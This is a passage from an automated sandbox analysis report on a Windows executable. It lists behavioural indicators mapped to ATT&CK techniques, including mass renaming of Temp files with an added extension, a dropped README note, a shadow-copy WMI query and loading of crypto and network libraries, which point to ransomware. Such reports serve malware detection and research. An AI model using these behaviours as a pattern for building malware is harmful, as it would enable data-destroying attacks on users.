\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ASPNETSetup_00002.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\c278146c-ed5a-46a3-b7ee-8da417122e54.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ccversion.tag.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrome_installer.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat17FA.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat17FB.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat2336.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat4FD7.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat4FF7.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat5008.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat558A.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat558B.tmp.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\dat558C.tmp.Uf0SZw0ws\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\System32\\*.dll\" [Source: 00000000-00004056-00000C2B-1298477904]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00004056-00000C28-2029430256]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT * FROM Win32_ShadowCopy\" (Source: 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp, Indicator: \"select * from win32_shadowcopy\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-4", "type": 6, "relevance": 1, "name": "Creates a writable file in a temporary directory", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" created file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\Uf0SZw0ws.README.txt\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f4ad77@RPCRT4.dll\"\n \"15001600c03e7f6c@advapi32.dll\"\n \"0e000f00703f7f6c@advapi32.dll\"\n \"0e000f00cc3f7f6c@advapi32.dll\"\n \"11001200b4477f6c@advapi32.dll\"\n \"1100120048487f6c@advapi32.dll\"\n \"120013008c487f6c@advapi32.dll\"\n \"12001300e4487f6c@advapi32.dll\"\n \"14001500386e7f6c@advapi32.dll\"\n \"14001500506e7f6c@advapi32.dll\"\n \"14001500686e7f6c@advapi32.dll\"\n \"17001800806e7f6c@advapi32.dll\"\n \"0d000e00986e7f6c@advapi32.dll\"\n \"11001200a86e7f6c@advapi32.dll\"\n \"11001200bc6e7f6c@advapi32.dll\"\n \"0f001000fc6f7f6c@advapi32.dll\"\n \"140015003c707f6c@advapi32.dll\"\n \"1400150054707f6c@advapi32.dll\"\n \"0c000d009c707f6c@advapi32.dll\"\n \"0c000d00ac707f6c@advapi32.dll\"\n \"0e000f00bc707f6c@advapi32.dll\"\n \"0e000f00cc707f6c@advapi32.dll\"\n \"0b000c00dc707f6c@advapi32.dll\"\n \"1800190014737f6c@RPCRT4.dll\"\n \"1300140040737f6c@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71310000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"KERNEL32\" at base 779c0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"NTDLL\" at base 77ca0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"USERENV.DLL\" at base 75db0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"USER32.DLL\" at base 778f0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"GDI32.DLL\" at base 76600000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"SHELL32.DLL\" at base 76ac0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"OLE32.DLL\" at base 77aa0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"SHLWAPI.DLL\" at base 77e90000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"OLEAUT32.DLL\" at base 77850000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WTSAPI32.DLL\" at base 73fc0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"RSTRTMGR.DLL\" at base 6d590000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"NETAPI32.DLL\" at base 74a10000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WKSCLI\" at base 74100000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"SRVCLI\" at base 757a0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"SAMCLI\" at base 73b80000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"NETUTILS\" at base 749d0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"LOGONCLI\" at base 75400000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"ACTIVEDS.DLL\" at base 6d0c0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75d10000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WININET.DLL\" at base 762a0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WSOCK32.DLL\" at base 70e20000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WS2_32\" at base 77df0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"MPR.DLL\" at base 72300000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"WINSPOOL.DRV\" at base 71d70000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"GPEDIT.DLL\" at base 6ab00000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"ADVAPI32.DLL\" at base 76550000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"RPCRT4.DLL\" at base 76870000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"NETUTILS.DLL\" at base 749d0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"PROFAPI.DLL\" at base 75bb0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"CRYPTBASE.DLL\" at base 75aa0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747a0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"CLBCATQ.DLL\" at base 777c0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 779c0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6e640000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6e790000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77e40000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"CRYPTSP.DLL\" at base 755b0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75340000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"KERNEL32.DLL\" at base 779c0000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b40000\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6fda0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetDefaultPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverPackagePathW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CorePrinterDriverInstalledW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetCorePrinterDriversW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter UploadPrinterDriverPackageW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter InstallPrinterDriverFromPackageW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnection2W (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter OpenPrinter2W (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterKeyW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrinterKeyW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SpoolerPrinterEvent (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetPortW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DocumentPropertySheets (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DevicePropertySheets (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeA (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPortExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrintProvidorW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrintProvidorW (UID: 